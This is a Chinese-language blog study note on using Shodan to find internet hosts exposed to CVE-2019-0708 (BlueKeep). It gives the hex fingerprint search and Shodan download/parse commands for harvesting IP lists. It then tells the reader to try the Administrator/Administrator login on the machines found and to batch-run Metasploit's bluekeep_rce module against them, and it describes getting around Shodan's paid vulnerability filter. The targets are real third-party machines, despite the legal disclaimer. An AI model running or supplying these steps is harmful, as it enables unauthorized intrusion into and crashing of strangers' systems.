shodan 【2】(泷羽sec)

声明

学习视频来自B站UP主 泷羽sec,如涉及侵泷羽sec权马上删除文章。

笔记只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负

这节课旨在扩大自己在网络安全方面的知识面,了解网络安全领域的见闻,了解学习哪些知识对于我们渗透测试有帮助,避免盲目地学习降低效率。


前言

shodan的指令语法很多,不可能说每个参数都讲完,因为有的参数压根用不上。

今天把一些红队常用的参数讲完,以cve-2019-0708的一个漏洞为例

cve-2019-0708

漏洞介绍

通过利用远程桌面的3389端口,RDP协议进行攻击,从而导致机器蓝屏瘫痪。该漏洞的触发无需任何用户交互操作,这就意味着,存在漏洞的计算机只要联网,无需任何操作,就有可能遭遇黑客远程攻击,运行恶意代码等,极具破坏性!

漏洞原理

存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行

复制代码
shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

#十六进制字符串(类似于指纹的方式去找)

'"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

上面这串字符串就是cve-2019-0708的十六进制漏洞特征,但是有漏洞不代表能直接利用

用Windows远程连接 看主机是否存活,IP已打码

远程连接出现后,可以测试弱口令 Administrator &Administrator

如果无法连接也没事,我们可以使用metasploit去进行批量的漏洞利用,msfconsole,讲到那学到哪,不用着急,工具也俗称msf

将命令输出的IP信息,复制到一个新建文本,只有IP,不要带端口,命名为01.txt,将其复制到kali

复制代码
msfconsole
#进入msf


search 01


use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

#进入利用脚本


show options


set rhosts file:(拖入复制的文本,比如文本从物理机桌面粘贴到kali桌面,在kali桌面点击拖住,移动到这条命令里)


check(开始检测)

#显示出来,有*的为利用不成功

攻击不成功有几点说一下,首先 show options 看清我们的payload ,IP端口要填对,另外就是show targets 它支持Windows7,sever这种,得把targets设置正确

这样找漏洞会方便很多

今天讲两个参数一个parse一个download

download(下载)

shodan download -h(查看帮助文档)

复制代码
shodan download 0001 --limit 100 '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

#下载有关cve-2019-0708漏洞的100条,'0001'仅为保存的文件名,可随意设置

#输入命令时,显示你在哪个目录,就去哪个目录去找"0001",输出格式为 '0001.json.gz'

如何打开 .json.gz这个输出文件呢,看下条参数

parse(可理解为解压)

shodan parse -h(查看帮助文档)

复制代码
shodan parse --fields ip_str 0001.json.gz

#直接在终端打开

或

shodan parse --fields ip_str 0001.json.gz >0001.txt

#将'0001.json.gz'输出为'0001.txt'

这是一个批量刷漏洞的一个姿势

当然,也可以用 这条命令:shodan search vuln:cve-2019-0708 ,但是这需要更高级别的账号去使用,我们用这种方式照样绕过它去批漏洞

遵纪守法,从我做起

相关推荐
love you joyfully11 分钟前
如何随时随地访问你的“进程”?
网络·人工智能·网络安全·远程访问·网络技术
勿忘初心12212 小时前
企业级敏感数据脱敏工具类(Java实现)
网络安全·后端开发·企业级开发·java 工具类·敏感数据脱敏·pipl
Chengbei112 小时前
AI大模型网关存在SQL注入、影响版本LiteLLM 1.81.16~1.83.7(CVE-2026-42208)
数据库·人工智能·sql·安全·web安全·网络安全·系统安全
一拳一个娘娘腔2 小时前
告别图形化界面:基于CLI的Windows系统入侵排查与防御实战手册
windows·安全
hwscom3 小时前
Linux服务器如何进行安全加固,防止黑客攻击(Windows也适用)
linux·服务器·安全
liann1193 小时前
3.4_Linux 应急响应排查速查命令表
linux·运维·服务器·安全·网络安全·系统安全
孪生质数-3 小时前
Linux高危漏洞通报Copy Fail - CVE-2026-31431
linux·运维·服务器·ubuntu·网络安全·debian·cve-2026-31431
vortex53 小时前
Villain:新一代轻量级 C2 框架完整使用指南
python·网络安全·kali·c2
汤愈韬3 小时前
Full Cone NAT、行为模式
网络·网络协议·网络安全·security
一拳一个娘娘腔4 小时前
攻防视角下的Windows凭证提取技术演进(2024-2026)
windows·安全